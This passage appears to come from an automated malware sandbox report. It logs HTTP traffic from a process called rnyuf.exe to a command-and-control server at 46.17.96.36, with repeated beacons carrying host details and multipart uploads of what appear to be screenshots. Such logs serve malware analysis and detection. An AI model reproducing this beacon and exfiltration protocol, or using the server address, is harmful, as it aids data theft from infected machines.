                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:00.942434072 CEST17508OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:29:00.942807913 CEST17517OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:29:00.942846060 CEST17523OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:00.974912882 CEST17526OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:00.974970102 CEST17544OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:29:01.078202009 CEST17593INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        287192.168.2.45002646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:00.970294952 CEST17523OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:01.052099943 CEST17592INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        288192.168.2.45002746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:01.327608109 CEST17593OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:01.407247066 CEST17594INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        289192.168.2.45002846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:01.473150015 CEST17594OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:01.473251104 CEST17594OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:01.473432064 CEST17605OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:01.473587036 CEST17607OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:01.508203983 CEST17610OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:01.508256912 CEST17615OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:01.508271933 CEST17621OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:29:01.508476973 CEST17627OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:29:01.508594990 CEST17633OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:01.543267012 CEST17635OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:01.543330908 CEST17638OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:29:01.651422024 CEST17703INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        29192.168.2.44976446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:23.407380104 CEST4149OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:23.407491922 CEST4149OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:23.407664061 CEST4159OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:23.407897949 CEST4162OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:23.440829992 CEST4165OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:23.440922976 CEST4168OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:23.440943003 CEST4182OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:23.441199064 CEST4185OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:23.441396952 CEST4188OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:23.477045059 CEST4193OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:23.477122068 CEST4196OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:23.582016945 CEST4257INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        290192.168.2.45002946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:01.656148911 CEST17704OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:01.727782965 CEST17704INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        291192.168.2.45003046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:01.955693007 CEST17705OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:02.031804085 CEST17744INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        292192.168.2.45003146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:01.970772028 CEST17705OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:01.971040964 CEST17705OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:01.971220970 CEST17715OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:01.971292019 CEST17718OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:02.003413916 CEST17721OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:02.003597021 CEST17724OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:02.003640890 CEST17726OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:29:02.003901958 CEST17738OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
